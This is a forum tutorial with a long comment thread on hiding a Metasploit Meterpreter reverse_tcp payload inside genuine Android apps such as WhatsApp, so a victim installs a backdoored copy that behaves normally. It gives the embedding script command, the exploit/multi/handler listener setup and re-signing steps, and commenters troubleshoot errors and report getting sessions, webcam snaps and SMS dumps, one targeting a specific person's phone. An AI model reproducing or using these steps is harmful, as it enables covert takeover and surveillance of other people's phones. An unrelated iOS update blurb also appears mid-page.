How To: Embed a Metasploit Payload in an Original .Apk File

Embed a Metasploit Payload in an Original .Apk File

UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found at my blog, here - at my blog, here -

Hi Fellas! I'm a new member to this community. Although I've been lurking around here for a while, I created an account and joined in recently.

I've learned much from the creator here at NullByte, so I'm hoping to become a contributing member also, so that I can give something back. And that's why I decided to write this article sharing an script I discovered recently.

I'm sure most of you, or at least those who have set a foot in the kingdom of hacking, have heard of Metasploit.

From Wikipedia,

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.

In a more informal language, it's a tool which we can use to perform various kinds of hacks against a machine. The flagship payload which comes with the Metasploit Framework is the 'Meterpreter', which also has an Android version that comes as an .apk file. In case you are wondering what an payload is, it's a program we can install on a victim's system to compromise it. Normally we have to install the payload in the victims phone by any means we can, and when the victim runs the application, we would get a direct connection to our victim's phone remotely and we can use it to wreak havoc on that phone.

But since the app doesn't look very legit, takes up only a few kBs, and doesn't show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn't install it at all. So we have to solve that problem.

Here's where this tutorial comes in. I'm gonna show you how to take any .apk file, be it WhatsApp or Amazon or SnapChat, and embed the Meterpreter payload in that apk. To the victim it will look and behave exactly as the original app, so he will use it regularly without any doubt, letting you do anything you want to his phone.


Just to be clear, In this tutorial the operating system used is Kali Linux, which is the de facto standard OS for Penetration Testing (Read, hacking). You should also install the latest version of 'ApkTool' and some libraries for the scripts to work properly.

To install the required libraries, enter this command at the console:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

And to get the latest version of ApkTool, head over to this site and follow the installation instructions: Link


First of all grab the original apk from any of the numerous websites available. Just do a google search "app_name apk download" and Google will come up with a lot of results. Save that apk in any folder, in this tutorial I will use the Root folder and a WhatApp.apk as example._


Download the Ruby script from this link and save it in the same folder as that of the original apk : Link


Open a terminal, and type the following command:

ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4895

In this example I've used as the Local IP address, i.e. your IP address and 4895 as the port on your Computer through which the Meterpreter payload will connect back to you. Make sure to change it to the appropriate values, especially the IP, the LPORT can be set to any reasonable port no.

Once you run the command, if you are lucky, the script will do everything by itself and complete the whole process. But more than often it cannot determine to which Activity of the App it should bind the Payload to, so it asks you to select it. In that case, leave the terminal with the script at the prompt, and browse to /root/original.

Then open the AndroidManifest.xml file using any text editor of your liking and look for an <activity> tag which contains both the texts '.MAIN' and '.LAUNCHER'. When you find that tag, look for the 'android:name' attribute of that tag and note the name of that Activity.

At the prompt of the Ruby script, enter the number corresponding to the Activity name you had noted previously and press Enter.

This is the hardest step of all, so I'm posting some screenshots also to make your life easier.


If you did everything correctly, you should now get a apk file in your root directory with the name 'backdoored_WhatsApp.apk'. It will install and run as the original App.

As for the listener, you should use exploit/multi/handler and set the corresponding options accordingly. Just run the following commands.

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LPORT 4895

Now when the victim runs the App, you will get a Meterpreter prompt in the terminal!


You must have noticed I haven't explained anything, rather asked you to blindly follow. As none of us wants to be a script-kiddie, we will learn how to do this manually in the next article. To be honest, I didn't know how to successfully implement this until I found this script. After I saw that this script does what it promises, I learned the process by reverse-engineering it. Let us set that story apart for another article.

If you face any problem, don't forget to mention it in the comments. I'll try to help you in any way I can.

I've also posted this on my newly created blog, so be sure to check that out also : Click here to see my blog


I found the script from the comments section of a thread in NullByte, so thanks to the guy who shared it, I'm sorry I don't remember which thread it was or who the guy was. And credit of making this script goes to timwr and Jack64. And last but not least, thanks to our admin OTW and the other creators for guiding us.

Just updated your iPhone? You'll find new features for Podcasts, News, Books, and TV, as well as important security improvements and fresh wallpapers. Find out what's new and changed on your iPhone with the iOS 17.5 update.


Im a little confuse about when and how to edit the android manifest file.

When i run the command and create the payload i get a sort of error like you said in your tutorial, but it created a payload.apk file in my root directory.

Tell me if im right,
I need to :
-Decompile the payload.apk with apktool
-edit the android manifest file
-recompile the app with apktool

Also when i go to root/original and try to open with gedit the androidmanifest file it doesnt open correctly

If im not on the good track could you help, otherwise if what i said sound ok i will be fine.

To be clear, you don't actually need to decompile and recompile the apk, the script automatically does that. And also you don't have to edit the AndroidManifest.xml file, you just have to open the file and look for the correct Activity name.

Can you tell me what error the script is throwing? That would clarify what kind of problem are you facing.

And also, the AndroidManifest.xml file will be different for every app, so you don't have to worry if yours doesn't look like the screenshot I posted.

Ok well i don't get the option to choose where to hook the payload like in your screenshot,that's what i get:

root@xorion:~# ruby apk-embed-payload.rb Nova\ Launcher\ Prime\ v4.2.0\ .apk -p android/meterpreter/reversetcp LHOST=1........LPORT=4444

* Generating msfvenom payload..
* Signing payload..
cp: target 'original.apk' is not a directory
* Decompiling orignal APK..
Input file (/root/original.apk) was not found or was not readable.
* Decompiling payload APK..

apk-embed-payload.rb:190:in `initialize': No such file or directory @ rbsysopen - original/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:190:in `open'
from apk-embed-payload.rb:190:in `<main>'

Forget about the missing lhost ip , i just removed it to post here.

It looks like the script couldn't find the apk file you wanted to embed the payload into. You can try to copy the apk to the root folder and then run the command:

ruby apk-embed-payload.rb apkname.apk -p android/meterpreter/reverse_tcp LHOST=ipaddress LPORT=4444

That's exactly what i do

What is the name of the apk file you're using?

nova launcher

From the error it' clear that the script is thinking that you're passing multiple files to it. Make sure that there's no slash and/or space in the filename. You can just rename it to something simple and them run the command.

I suggest you do this: Rename the nova launcher apk to 'app.apk' and then run the command -
ruby apk-payload-embedder.rb app.apk -p android/meterpreter/reverse_tcp LHOST=yoour_ip LPORT=4444

Ok, i got it working exept for the part when i test the apk and try to install it.
I get the error when i try to install it it tells me error analysing the packet.
You don't need to sign the apk afterwards?

The script does all that by itself, so it shouldn't be a problem. Maybe you can try with another apk and see if it works.

Well i tried with a 3rd app and this one i didn't need to change anything to the hook point, but still, same error "error analysing the packet" when i try to install it.

I tried with different android file manager but same thing.

You've probably checked it already, but still, can you install those original apks, without embedding the payload? And also you can try to embed other payloads like reverse_https and see if that works.

I tried with another app but same problem could it be the hook point?

Ok i will try with another app, because i tested on 2 phones and same thing.
And i'm pretty sure i placed the hook at the right place.

I have exactly the same problem... also tried with 2 phones. Have you solved this? I have tried the original.apk and payload .apk and they both work fine but just not the recompiled apk.... shows error: There is a Problem Parsing the Package

i got no error with using script but after apk is created when i install in it says
"App not installed"
"The pachage appears to be corrupted"
any solution?? Thankx!!!


when I put my command (ruby apk-embed-payload.rb apkname.apk -p android/meterpreter/reversetcp LHOST=ipaddress LPORT=4444) the terminal displays me the apktool command options.

Also, when I can't find the AndroidManifest.xml file

Tell me exactly what error message is it giving. Copy and paste it here.
And also, Have you installed the lastest apktool from the link I gave in the post?

Getting this error
ruby: No such file or directory -- apk-payload-embedder.rb (LoadError)
and i have ruby installed

If you didn't save the script in the root folder then you have to supply the full path to the script as the argument.
Enter ruby /path_to_script/apk-payload-embedder.rb ...[the remaining command]

Sorry, I put the command wrong in the post. The file name would be "apk-embed-payload.rb".

Hello, and firstly, thanks for a great post.
I've got an error that simply states "No Jarsigner". What should I do to fix this?


You may have to install the latest java

i do exactly what bro do
but i fail to install the apk to the phone
may i know what happen?

What error is it giving when you are trying to install the apk?

the backdooredapk dint hav meta INF folder which i cant install the apk to the phone

Is there a way to embed the payload to a service? Which constantly runs?

Whenever I enter this
ruby apk-embed-payload.rb WhatsApp.apk -p android/meterpreter/reversetcp LHOST= LPORT=4895
This happens
Apktool v1.5.2 - a tool for reengineering Android apk files
Copyright 2010 Ryszard Wisniewski <>
with smali v1.4.1, and baksmali v1.4.1
Updated by @iBotPeaches <>
Apache License 2.0 (

Usage: apktool -q|--quiet OR -v|--verbose COMMAND ...


decode OPTS <file.apk> <dir>
Decode <file.apk> to <dir>.


-s, --no-src
Do not decode sources.
-r, --no-res
Do not decode resources.
-d, --debug
Decode in debug mode. Check project page for more info.
-b, --no-debug-info
Baksmali -- don't write out debug info (.local, .param, .line, etc.)
-f, --force
Force delete destination directory.
-t <tag>, --frame-tag <tag>
Try to use framework files tagged by <tag>.
--frame-path <dir>
Use the specified directory for framework files
Use if there was an error and some resources were dropped, e.g.:
"Invalid config flags detected. Dropping resources", but you
want to decode them anyway, even with errors. You will have to
fix them manually before building.

build OPTS <app_path> <out_file>
Build an apk from already decoded application located in <apppath>.

It will automatically detect, whether files was changed and perform
needed steps only.

If you omit <apppath> then current directory will be used.
If you omit <outfile> then <apppath>/dist/<nameoforiginal.apk>
will be used.


-f, --force-all
Skip changes detection and build all files.
-d, --debug
Build in debug mode. Check project page for more info.
-a, --aapt
Loads aapt from specified location.

if|install-framework <framework.apk> <tag> --frame-path <location>
Install framework file to your system.

For additional info, see:
For smali/baksmali info, see:
What should I do?

Plus On, @ Jamell, I have exactly the same problem...

Have you found out the problem?

What are we missing?


Ok so I saw the mistake. Its from when you have installed APKTOOL.

follow these instructions again and it will work:


Download Linux wrapper script (Right click, Save Link As apktool)
Download apktool-2 (find newest here)

Make sure you have the 32bit libraries (ia32-libs) downloaded and installed by your linux package manager, if you are on a 64bit unix system.

(This helps provide support for the 32bit native binary aapt, which is required by apktool)

Focus on this part! Thats where i went wrong...

Rename downloaded jar to apktool.jar
Move both files (apktool.jar & apktool) to /usr/local/bin (root needed)
Make sure both files are executable (chmod +x)
Try running apktool via cli

whenever i enter the command above to run the script it simply displays the apktool menu and nothing else.
what should i do?
here's what it looks like

root@aaronstoneuk:~# ruby apk-embed-payload.rb /root/wps.apk -p android/meterpreter/reversetcp LHOST= LPORT=4895

  • Apktool version 22:05:42 up 53 min, 1 user, load average: 0.47, 0.56, 0.51

root tty2 :1 21:13 52:50 11:43 4:36 iceweasel
Apktool v2.1.1-dirty - a tool for reengineering Android apk files
with smali v2.1.2-dev and baksmali v2.1.2-dev
Copyright 2014 Ryszard Wisniewski <>
Updated by Connor Tumbleson <>

usage: apktool
-advance,--advanced prints advance information.
-version,--version prints the version then exits
usage: apktool if|install-framework options <framework.apk>
-p,--frame-path <dir> Stores framework files into <dir>.
-t,--tag <tag> Tag frameworks using <tag>.
usage: apktool decode options <fileapk>
-f,--force Force delete destination directory.
-o,--output <dir> The name of folder that gets written. Default is apk.out
-p,--frame-path <dir> Uses framework files located in <dir>.
-r,--no-res Do not decode resources.
-s,--no-src Do not decode sources.
-t,--frame-tag <tag> Uses framework files tagged by <tag>.
usage: apktool build options <apppath>
-f,--force-all Skip changes detection and build all files.
-o,--output <dir> The name of apk that gets written. Default is dist/name.apk
-p,--frame-path <dir> Uses framework files located in <dir>.

For additional info, see:
For smali/baksmali info, see:
not supported, please download the latest 2. version from git.
ps: i have all the libraries installed.
Any help is appreciated.

Hi Skulltech,

When I run the command I get this error...

* Generating msfvenom payload..
* Signing payload..
* Decompiling orignal APK..
* Decompiling payload APK..
Exception in thread "main" brut.androlib.AndrolibException: Could not decode arsc file
at brut.androlib.res.decoder.ARSCDecoder.decode(
at brut.androlib.res.AndrolibResources.getResPackagesFromApk(
at brut.androlib.res.AndrolibResources.loadMainPkg(
at brut.androlib.res.AndrolibResources.getResTable(
at brut.androlib.Androlib.getResTable(
at brut.androlib.ApkDecoder.setTargetSdkVersion(
at brut.androlib.ApkDecoder.decode(
at brut.apktool.Main.cmdDecode(
at brut.apktool.Main.main(
Caused by: Expected: 0x00000008, got: 0x00000000
at brut.util.ExtDataInput.skipCheckShort(
at brut.androlib.res.decoder.ARSCDecoder.readValue(
at brut.androlib.res.decoder.ARSCDecoder.readEntry(
at brut.androlib.res.decoder.ARSCDecoder.readConfig(
at brut.androlib.res.decoder.ARSCDecoder.readType(
at brut.androlib.res.decoder.ARSCDecoder.readPackage(
at brut.androlib.res.decoder.ARSCDecoder.readTable(
at brut.androlib.res.decoder.ARSCDecoder.decode(
... 8 more
* Locating onCreate() hook..
* Copying payload files..
* Loading original/smali/com/snapchat/android/LandingPageActivity.smali and injecting payload..
* Poisoning the manifest with meterpreter permissions.._

apk-embed-payload.rb:79:in `initialize': No such file or directory @ rbsysopen - payload/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:79:in `open'
from apk-embed-payload.rb:79:in `fixmanifest'
from apk-embed-payload.rb:225:in `<main>'_

Can you spot the problem at all?

Cheer mate!

SOLVED: Install the latest APKTOOL's..

ruby apk-embed-payload.rb app.apk -p android/meterpreter/reversetcp LHOST= LPORT=53000
* Generating msfvenom payload..
* Signing payload..
* Decompiling orignal APK..

Exception in thread "main" brut.androlib.AndrolibException: error in opening zip file

at brut.androlib.ApkDecoder.hasResources(
at brut.androlib.ApkDecoder.decode(
at brut.apktool.Main.cmdDecode(
at brut.apktool.Main.main(
Caused by: error in opening zip file
at brut.androlib.res.util.ExtFile.getDirectory(
at brut.androlib.ApkDecoder.hasResources(
... 3 more
Caused by: error in opening zip file
at Method)
... 6 more
* Decompiling payload APK..

apk-embed-payload.rb:190:in `initialize': No such file or directory @ rbsysopen - original/AndroidManifest.xml (Errno::ENOENT)

from apk-embed-payload.rb:190:in `open'
from apk-embed-payload.rb:190:in `<main>'
help please

here's screenshot.

When I tried installing that cocbackdoored.apk in my android device running lollipop, it gave the error "There's a problem parsing the package"

When I signed this cocbackdoored.apk following step6 on

The signed apk did install but I can't get a meterpreter session from it.

I've also tried the above with Lhost=(my external IP). But still no meterpreter session.

Any help?

just drag and drop the ruby file and APK file into terminal window!


When I followed the steps on this page with whatsapp original apk and then signed the produced "whatsappbackdoor.apk" following step6 on

It installed on my device and also gave me a meterpreter session. So, finally thank you so much for this tutorial. But, one question though(regarding my above/previous comment). Can you tell why didn't it work with the Clash of Clans original apk?

  • Could you guys please create a video on how to do this?

i could not find the package.. suggest me further.. thanks in advance

hi Eshan... i have more doubts... can i ask you ?

I had problems running the apk. could not install on phone. i had too resign it with this tool

place all of the files into a folder. and your apk then go too this folder in cmd
and run this command.
java -jar signapk.jar certificate.pem key.pk8 yourapkname.apk signedapkname.apk

Cant find the source of the website i got this from. might have been the original poster. sorry!

And i also think if this script runs itself it does not allways attache to the right attribute, i did try this on WAN and got a randon ip what looked like the ip of the app server. and dropped connection. very unskilled at this could somebody explain?

Ive been trying to get it running on my phone (over WAN) while using mobile internet. Got following messages all the time and can only run core commands in the short amount of time I get, before the session closes.

msf exploit(handler) > exploit

  • Handler failed to bind to XXX.XXX.XXX.XXX:8080:- -

Started reverse TCP handler on
* Starting the payload handler...
* Sending stage (60830 bytes) to XXX.XXX.XXX.XXX
* Meterpreter session 5 opened ( -> at 2016-01-15 00:24:31 +0000
* Sending stage (60830 bytes) to XXX.XXX.XXX.XXX

meterpreter >

  • Meterpreter session 5 is not valid and will be closed

* XXX.XXX.XXX.XXX - Meterpreter session 5 closed.

Is it a bad internet connection of my mobile or somthing else?

Pls help

thanks in advance

I'm also recently facing that problem, didn't face it before. Maybe it's because of a recent Metasploit update, I'm not sure. i will look into it.

link is disabled , reupload please ? thanks alot .

Thanks for letting me know about that, I've updated the link. ;)

about the Meterpreter session closed error on cellular network you can use metasploit v4.11.1

Allright SKullTech, I understood everything. But I was wondering (excuse my ignorance; I'm new to all this) why the ruby script (that you mentioned in step 2) already contains these payloads code?


unless(apkfile && File.readable?(apkfile))
puts "Usage: #{$0} target.apk msfvenom options\n"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reversehttps LHOST= LPORT=8443"


cause if you write something stupid, this EXAMPLE show you how to do it good

Friend I am Not able to download the file(ruby script) the file has been remove can you help me out


I follow your tutorial and every thinks work fine.but when i want embed payload to telegram messenger i get some error.

this is a telegram messenger link from playe store

i must paste payload code to the lunchactivity.smali but there is 15 number of this file.

this is my orginal file AndroidManifest.xml

and this is LunchActivity.smali but i find 4 onCreate method

finaly when i run script and choos LunchActivity.smali(number 39) insted of hook i get this error.

A way for lazies people via Ruby script

I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it

This script is a POC for injecting metasploit payloads on arbitrary APKs
Authored by timwr, Jack64 , Updated by xC0d3rZ
The Script


apk-embed-payload.rb {target.apk} {msfvenom options}

e.g. apk-embed-payload.rb messenger.apk -p android/meterpreter/reverse_https LHOST= LPORT=8443

To easy ..

The link of the script you posted is unavailable!

Hi SkullTech

I embed the payload/trojan into the original apk which in my case it's ADM.apk then sign it , after I install the apk it works properly and as long as the android device is connected to WiFi I can do everything from msfconsole like downloading or webcamsnap or dumpsms etc. but when I turn off the wifi and turn the mobile data on ( I set it on 2G because the victim that I want to install the apk on his phone has 2G!!!!! and I want everything to be the same as his situation) in my msfconsole I just can do the core commands like "run" and if I try all the other commands it will say something like :

Unknown command: ls
Unknown command: pwd
I just can get his ip. but the problem is when I locate him it shows the wrong location.
what should I do to make the other commands work properly on mobile data like they work properly on WiFi?
I appreciate your answers. Thanks

hi guys
when i want to install embed apk file in my phone i get this popup message,is there anyway to not showing this?

hi, i tried to rebuilding infectedapk like as you. but, when i instal that, aplication get force close. i triedwith whatsapp and b612 but it's same get error force close. do you know why ? please help me. thanks


I tried somethings yesterday and I fixed the problem by resigning the Backdoored apk file, you can Download this file :

if you don't have Java in Kali Linux,before you can install apksign with the terminal :
apt-get install apksign

when the apksign zip file is downloaded you can unzip it and then go to the folder in the terminal :
cd /root/Downloads/ApkSign/ and after that resign the backdoored apk file:
apksign certificate.pem key.pk8 /input/ /output/

eg : apksign certificate.pem key.pk8 /root/Downloads/Facebookbackdoored.apk /root/Downloads/ResignedFacebook.apk

Now, you can install the apk file in the phone and each time the application is opened, you have a meterpreter command line.

This fix is 100% functional. Hope it can help you too.

Ok Buno i will try this afternoon and report back to results, i also get the same issue when try to run the .apk on the tablet or phone "error while parsing". Everything went beautifully for me on the tutorial ..the script did it all but still unable to install the .apk

hi when i compile the original Apk i have this message:

..\3-Out\com.facebook.lite.apk\smali\com\facebook\lite\MainActivity.smali521,4 Invalid register: v22. Must be between v0 and v15, inclusive.

..\3-Out\com.facebook.lite.apk\smali\com\facebook\lite\MainActivity.smali522,4 Invalid register: v22. Must be between v0 and v15, inclusive.

Exception in thread "main" brut.androlib.AndrolibException: Could not smali file: com/facebook/lite/MainActivity.smali
at brut.androlib.src.SmaliBuilder.buildFile(
at brut.androlib.Androlib.buildSourcesSmali(
at brut.androlib.Androlib.buildSources(
at brut.apktool.Main.cmdBuild(
at brut.apktool.Main.main(

the error is this line : invoke-static {p0}, Lcom/metasploit/stage/Payload;->startService(Landroid/content/Context;)V
plz how can solv


>Injected payload to cc cleaner using apk-embed-payload.rb
>Signed!! using apk-sign
>Installed well on Android 6.0 Marshmallow!!
>>>Tried to open the app but it's crashing with general error. "Unfortunately, CC cleaner has stopped."

Tried with others apps also like facebook Lite, Calculator etc.. n it throws same error !!
What went wrong.???
Thanks in advance!!

i got apk file but when i tried to install it says there was a problem parsing the package

last link is no working

during installation every thing went fine.but there is not backdoor.apk file saved in folder .any help?

is there anyway to customize permissions. for example i only need my backdoor send sms archive to me i dont any other thing to do.

I did everything as it's instructed but getting two apks at the end of the process and i can't install lib32 files because i have 64bit OS what to do? if i have to do all manually. it's says that i get the backdoorapp.apk but i'm getting original.apk and payload . apk that's what you do with apktool to decompile apks. what step i'm missing or what should i do to get full backdoored apk autometically


please help me

can anyone tell me am struct in Unable to find hook point

which one should i choose to create hook

what should i do?
#please help me

Share Your Thoughts

  • Hot
  • Latest